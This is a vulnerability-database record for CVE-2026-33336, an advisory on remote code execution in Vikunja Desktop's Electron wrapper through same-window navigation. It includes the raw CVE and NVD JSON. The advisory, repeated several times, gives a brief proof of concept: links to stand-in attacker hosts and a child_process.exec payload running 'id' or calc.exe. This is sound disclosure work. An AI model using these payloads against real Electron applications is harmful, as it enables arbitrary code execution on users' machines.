CVE-2026-33336 (GCVE-0-2026-33336)
Vulnerability from cvelistv5 – Published: 2026-03-24 15:16 – Updated: 2026-03-24 17:44
VLAI?
Title
Vikunja Desktop vulnerable to Remote Code Execution via same-window navigation
Summary
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.
## Root cause
Two misconfigurations combine to create this vulnerability:
1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).
2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:
- `<a href="https://...">` links (without `target="_blank"`)
- `window.location` assignments
- HTTP redirects
- `<meta http-equiv="refresh">` tags
## Attack scenario
1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>`
3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.
4. The victim uses Vikunja Desktop and clicks the link.
5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.
6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');`
7. Arbitrary commands execute as the victim's OS user.
## Impact
Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.
## Proof of concept
1. Set up a Vikunja instance with two users sharing a project.
2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>`
3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>`
4. As the victim, open the project in Vikunja Desktop and click the link.
5. calc.exe (or any other command) executes on the victim's machine.
## Credits
This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
Severity ?
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| go-vikunja | vikunja |
Affected:
>= 0.21.0, < 2.2.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33336",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-24T17:44:15.039117Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-24T17:44:50.761Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "vikunja",
"vendor": "go-vikunja",
"versions": [
{
"status": "affected",
"version": "\u003e= 0.21.0, \u003c 2.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim\u0027s machine. Version 2.2.0 patches the issue.\n\n## Root cause\n\nTwo misconfigurations combine to create this vulnerability:\n\n1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).\n\n2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:\n - `\u003ca href=\"https://...\"\u003e` links (without `target=\"_blank\"`)\n - `window.location` assignments\n - HTTP redirects\n - `\u003cmeta http-equiv=\"refresh\"\u003e` tags\n\n## Attack scenario\n\n1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).\n2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `\u003ca href=\"https://evil.example/exploit\"\u003eClick here for the updated design spec\u003c/a\u003e`\n3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.\n4. The victim uses Vikunja Desktop and clicks the link.\n5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.\n6. The attacker\u0027s page now executes in a context with `nodeIntegration: true` and runs: `require(\u0027child_process\u0027).exec(\u0027id \u003e /tmp/pwned\u0027);`\n7. Arbitrary commands execute as the victim\u0027s OS user.\n\n## Impact\n\nFull remote code execution on the victim\u0027s desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.\n\n## Proof of concept\n\n1. Set up a Vikunja instance with two users sharing a project.\n2. As the attacker user, edit a project description to include: `\u003ca href=\"https://attacker.example/poc.html\"\u003eMeeting notes\u003c/a\u003e`\n3. Host poc.html with: `\u003cscript\u003erequire(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\u003c/script\u003e`\n4. As the victim, open the project in Vikunja Desktop and click the link.\n5. calc.exe (or any other command) executes on the victim\u0027s machine.\n\n## Credits\n\nThis vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows)."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-24T15:16:14.681Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf"
},
{
"name": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released",
"tags": [
"x_refsource_MISC"
],
"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
}
],
"source": {
"advisory": "GHSA-83w9-9jf6-88vf",
"discovery": "UNKNOWN"
},
"title": "Vikunja Desktop vulnerable to Remote Code Execution via same-window navigation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33336",
"datePublished": "2026-03-24T15:16:14.681Z",
"dateReserved": "2026-03-18T22:15:11.812Z",
"dateUpdated": "2026-03-24T17:44:50.761Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33336\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-24T16:16:33.387\",\"lastModified\":\"2026-03-27T16:54:35.503\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim\u0027s machine. Version 2.2.0 patches the issue.\\n\\n## Root cause\\n\\nTwo misconfigurations combine to create this vulnerability:\\n\\n1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).\\n\\n2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:\\n - `\u003ca href=\\\"https://...\\\"\u003e` links (without `target=\\\"_blank\\\"`)\\n - `window.location` assignments\\n - HTTP redirects\\n - `\u003cmeta http-equiv=\\\"refresh\\\"\u003e` tags\\n\\n## Attack scenario\\n\\n1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).\\n2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `\u003ca href=\\\"https://evil.example/exploit\\\"\u003eClick here for the updated design spec\u003c/a\u003e`\\n3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.\\n4. The victim uses Vikunja Desktop and clicks the link.\\n5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.\\n6. The attacker\u0027s page now executes in a context with `nodeIntegration: true` and runs: `require(\u0027child_process\u0027).exec(\u0027id \u003e /tmp/pwned\u0027);`\\n7. Arbitrary commands execute as the victim\u0027s OS user.\\n\\n## Impact\\n\\nFull remote code execution on the victim\u0027s desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.\\n\\n## Proof of concept\\n\\n1. Set up a Vikunja instance with two users sharing a project.\\n2. As the attacker user, edit a project description to include: `\u003ca href=\\\"https://attacker.example/poc.html\\\"\u003eMeeting notes\u003c/a\u003e`\\n3. Host poc.html with: `\u003cscript\u003erequire(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\u003c/script\u003e`\\n4. As the victim, open the project in Vikunja Desktop and click the link.\\n5. calc.exe (or any other command) executes on the victim\u0027s machine.\\n\\n## Credits\\n\\nThis vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).\"},{\"lang\":\"es\",\"value\":\"Vikunja es una plataforma de gesti\u00f3n de tareas de c\u00f3digo abierto y autoalojada. Desde la versi\u00f3n 0.21.0 hasta la versi\u00f3n 2.2.0, el envoltorio Electron de Vikunja Desktop habilita `nodeIntegration` en la ventana principal del navegador (BrowserWindow) y no restringe las navegaciones dentro de la misma ventana. Un atacante que pueda colocar un enlace en contenido generado por el usuario (descripciones de tareas, comentarios, descripciones de proyectos) puede hacer que BrowserWindow navegue a un origen controlado por el atacante, donde JavaScript se ejecuta con acceso completo a Node.js, lo que da lugar a la ejecuci\u00f3n de c\u00f3digo arbitrario en el equipo de la v\u00edctima. La versi\u00f3n 2.2.0 corrige el problema. ## Causa ra\u00edz Dos errores de configuraci\u00f3n se combinan para crear esta vulnerabilidad: 1. **`nodeIntegration: true`** est\u00e1 establecido en las preferencias web de `BrowserWindow` (`desktop/main.js:14-16`), lo que otorga a cualquier p\u00e1gina cargada en el renderizador acceso completo a las API de Node.js (`require`, `child_process`, `fs`, etc.). 2. **No hay ning\u00fan controlador `will-navigate` o `will-redirect`** registrado en `webContents`. El `setWindowOpenHandler` existente (`desktop/main.js:19-23`) solo intercepta las llamadas a `window.open()` (solicitudes de nuevas ventanas). **No** intercepta las navegaciones dentro de la misma ventana provocadas por: - Enlaces `\u003ca href=\\\"https://...\\\" rel=\\\"nofollow\\\"\u003e` (sin `target=\u00ab_blank\u00bb`) - Asignaciones de `window.location` - Redireccionamientos HTTP - Etiquetas `` ## Escenario de ataque 1. El atacante es un usuario normal en la misma instancia de Vikunja (por ejemplo, un miembro de un proyecto compartido). 2. El atacante crea o edita la descripci\u00f3n de un proyecto o de una tarea que contiene un enlace HTML est\u00e1ndar, por ejemplo: `\u003c/a\u003e\u003ca href=\\\"https://evil.example/exploit\\\" rel=\\\"nofollow\\\"\u003eHaga clic aqu\u00ed para ver las especificaciones de dise\u00f1o actualizadas\u003c/a\u003e` 3. La interfaz de Vikunja muestra este enlace. El proceso de sanitizaci\u00f3n de DOMPurify lo permite correctamente, ya que se trata de una etiqueta de anclaje leg\u00edtima y no de una inyecci\u00f3n de c\u00f3digo. Ejemplo de ruta de renderizado: `frontend/src/views/project/ProjectInfo.vue` utiliza `v-html` con salida sanitizada por DOMPurify. 4. La v\u00edctima utiliza Vikunja Desktop y hace clic en el enlace. 5. Como no existe ning\u00fan controlador `will-navigate`, BrowserWindow navega a `https://evil.example/exploit` en el mismo proceso de renderizado. 6. La p\u00e1gina del atacante se ejecuta ahora en un contexto con `nodeIntegration: true` y ejecuta: `require(\u201cchild_process\u201d).exec(\u201cid \u0026gt; /tmp/pwned\u201d);` 7. Se ejecutan comandos arbitrarios como usuario del sistema operativo de la v\u00edctima. ## Impacto Ejecuci\u00f3n remota completa de c\u00f3digo en el escritorio de la v\u00edctima. El atacante puede leer/escribir archivos arbitrarios, ejecutar comandos arbitrarios, instalar malware o puertas traseras, y sustraer credenciales y datos confidenciales. No se requiere ninguna vulnerabilidad XSS: basta con un hiperv\u00ednculo normal aprobado por el sanitizador. ## Prueba de concepto 1. Configura una instancia de Vikunja con dos usuarios que compartan un proyecto. 2. Como usuario atacante, edita la descripci\u00f3n del proyecto para incluir: `\u003ca href=\\\"https://attacker.example/poc.html\\\" rel=\\\"nofollow\\\"\u003eNotas de la reuni\u00f3n\u003c/a\u003e` 3. Aloja el archivo poc.html con: `` 4. Como v\u00edctima, abre el proyecto en Vikunja Desktop y haz clic en el enlace. 5. Se ejecuta calc.exe (o cualquier otro comando) en el equipo de la v\u00edctima. ## Cr\u00e9ditos Esta vulnerabilidad se detect\u00f3 utilizando [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"0.21.0\",\"versionEndExcluding\":\"2.2.2\",\"matchCriteriaId\":\"AE5EF0A7-C1CA-45D6-9422-16F867671DFF\"}]}]}],\"references\":[{\"url\":\"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33336\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T17:44:15.039117Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T17:44:19.016Z\"}}], \"cna\": {\"title\": \"Vikunja Desktop vulnerable to Remote Code Execution via same-window navigation\", \"source\": {\"advisory\": \"GHSA-83w9-9jf6-88vf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"go-vikunja\", \"product\": \"vikunja\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.21.0, \u003c 2.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf\", \"name\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\", \"name\": \"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim\u0027s machine. Version 2.2.0 patches the issue.\\n\\n## Root cause\\n\\nTwo misconfigurations combine to create this vulnerability:\\n\\n1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).\\n\\n2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:\\n - `\u003ca href=\\\"https://...\\\"\u003e` links (without `target=\\\"_blank\\\"`)\\n - `window.location` assignments\\n - HTTP redirects\\n - `\u003cmeta http-equiv=\\\"refresh\\\"\u003e` tags\\n\\n## Attack scenario\\n\\n1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).\\n2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `\u003ca href=\\\"https://evil.example/exploit\\\"\u003eClick here for the updated design spec\u003c/a\u003e`\\n3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.\\n4. The victim uses Vikunja Desktop and clicks the link.\\n5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.\\n6. The attacker\u0027s page now executes in a context with `nodeIntegration: true` and runs: `require(\u0027child_process\u0027).exec(\u0027id \u003e /tmp/pwned\u0027);`\\n7. Arbitrary commands execute as the victim\u0027s OS user.\\n\\n## Impact\\n\\nFull remote code execution on the victim\u0027s desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.\\n\\n## Proof of concept\\n\\n1. Set up a Vikunja instance with two users sharing a project.\\n2. As the attacker user, edit a project description to include: `\u003ca href=\\\"https://attacker.example/poc.html\\\"\u003eMeeting notes\u003c/a\u003e`\\n3. Host poc.html with: `\u003cscript\u003erequire(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\u003c/script\u003e`\\n4. As the victim, open the project in Vikunja Desktop and click the link.\\n5. calc.exe (or any other command) executes on the victim\u0027s machine.\\n\\n## Credits\\n\\nThis vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-24T15:16:14.681Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33336\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T17:44:50.761Z\", \"dateReserved\": \"2026-03-18T22:15:11.812Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-24T15:16:14.681Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…